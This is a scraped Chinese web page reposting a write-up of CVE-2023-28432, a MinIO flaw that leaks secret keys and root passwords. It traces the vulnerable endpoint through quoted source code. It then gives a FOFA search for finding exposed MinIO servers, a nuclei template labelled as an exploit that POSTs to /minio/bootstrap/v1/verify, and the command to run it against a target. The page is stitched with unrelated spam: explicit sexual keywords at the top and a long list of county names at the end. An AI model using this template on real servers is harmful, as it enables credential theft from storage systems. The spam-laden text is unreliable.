五月天青色头像情侣网名,国产亚洲av片在线观看18女人,黑人巨茎大战俄罗斯美女,扒下她的小内裤打屁股

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

CVE-2023-28432

2023-03-24 14:15 作者:青陽(yáng)小棧  | 我要投稿

CVE-2023-28432

CVE-2023-28432 nuclei templates

Dec

Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.

vuln info

# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L197// Verify - fetches system server config.func (client *bootstrapRESTClient) Verify(ctx context.Context, srcCfg ServerSystemConfig) (err error) { if newObjectLayerFn() != nil { return nil } respBody, err := client.callWithContext(ctx, bootstrapRESTMethodVerify, nil, nil, -1) if err != nil { return } defer xhttp.DrainBody(respBody) recvCfg := ServerSystemConfig{} if err = json.NewDecoder(respBody).Decode(&recvCfg); err != nil { return err } return srcCfg.Diff(recvCfg) } # https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L54const ( bootstrapRESTVersion ? ? ? = "v1" bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion bootstrapRESTPrefix ? ? ? ?= minioReservedBucketPath + "/bootstrap" bootstrapRESTPath ? ? ? ? ?= bootstrapRESTPrefix + bootstrapRESTVersionPrefix)const ( bootstrapRESTMethodHealth = "/health" bootstrapRESTMethodVerify = "/verify")// To abstract a node over network.type bootstrapRESTServer struct{}// ServerSystemConfig - captures information about server configuration.type ServerSystemConfig struct { MinioEndpoints EndpointServerPools MinioEnv ? ? ? map[string]string} # https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L149func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) { ctx := newContext(r, w, "VerifyHandler") if err := storageServerRequestValidate(r); err != nil { b.writeErrorResponse(w, err) return } cfg := getServerSystemCfg() logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg)) }// registerBootstrapRESTHandlers - register bootstrap rest router.func registerBootstrapRESTHandlers(router *mux.Router) { server := &bootstrapRESTServer{} subrouter := router.PathPrefix(bootstrapRESTPrefix).Subrouter() subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodHealth).HandlerFunc( httpTraceHdrs(server.HealthHandler)) subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify).HandlerFunc( httpTraceHdrs(server.VerifyHandler)) } # https://github.com/minio/minio/blob/master/cmd/object-api-utils.go#L210// SlashSeparator - slash separator.const SlashSeparator = "/"https://github.com/minio/minio/blob/master/cmd/generic-handlers.go#L138const ( minioReservedBucket ? ? ? ? ? ? ?= "minio" minioReservedBucketPath ? ? ? ? ?= SlashSeparator + minioReservedBucket minioReservedBucketPathWithSlash = SlashSeparator + minioReservedBucket + SlashSeparatorSlashSeparator = "/"minioReservedBucketPath = SlashSeparator + minioReservedBucket ==> /miniobootstrapRESTPrefix ? ? ? ?= minioReservedBucketPath + "/bootstrap" ==> /minio/bootstrap/bootstrapRESTVersion ? ? ? = "v1"bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion ==> /v1bootstrapRESTMethodVerify = "/verify"subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify) ==> /v1/verify/final path:/minio/bootstrap/v1/verify/

fofa

app="minio"

EXP

id: CVE-2023-28432info: ?name: Minio post policy request security bypass ?author: Mr-xn ?severity: high ?description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. ?reference: ? ?- https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q ? ?- https://github.com/minio/minio/pull/16853/files ? ?- https://github.com/golang/vulndb/issues/1667 ? ?- https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json ?classification: ? ?cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N ? ?cvss-score: 7.5 ? ?cve-id: CVE-2023-28432 ? ?cwe-id: CWE-200 ?tags: cve,cve2023,requests: ?- raw: ? ? ?- |+ ? ? ? ?POST /minio/bootstrap/v1/verify HTTP/1.1 ? ? ? ?Host: {{Hostname}} ? ? ? ?Content-Type: application/x-www-form-urlencoded ? ?matchers-condition: and ? ?matchers: ? ? ?- type: word ? ? ? ?part: body ? ? ? ?words: ? ? ? ? ?- '"MinioEndpoints"' ? ? ?- type: word ? ? ? ?part: header ? ? ? ?words: ? ? ? ? ?- 'Content-Type: text/plain' ? ? ?- type: status ? ? ? ?status: ? ? ? ? ?- 200

nuclei

nuclei -v -t /path/to/CVE-2023-28432.yaml -u?http://target.com:port

reference:

  • https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q

  • https://github.com/minio/minio/pull/16853/files

  • golang/vulndb#1667

  • https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json


CVE-2023-28432的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
淮北市| 纳雍县| 大足县| 离岛区| 泉州市| 汝城县| 巴中市| 岑溪市| 化隆| 囊谦县| 康乐县| 旬邑县| 六枝特区| 珠海市| 连城县| 克东县| 台东县| 江口县| 汝阳县| 广灵县| 同心县| 通海县| 昌乐县| 和平区| 沐川县| 芜湖市| 黄骅市| 香格里拉县| 右玉县| 水城县| 漳浦县| 南木林县| 永丰县| 巴里| 曲麻莱县| 盘山县| 个旧市| 克什克腾旗| 萨迦县| 左云县| 曲周县|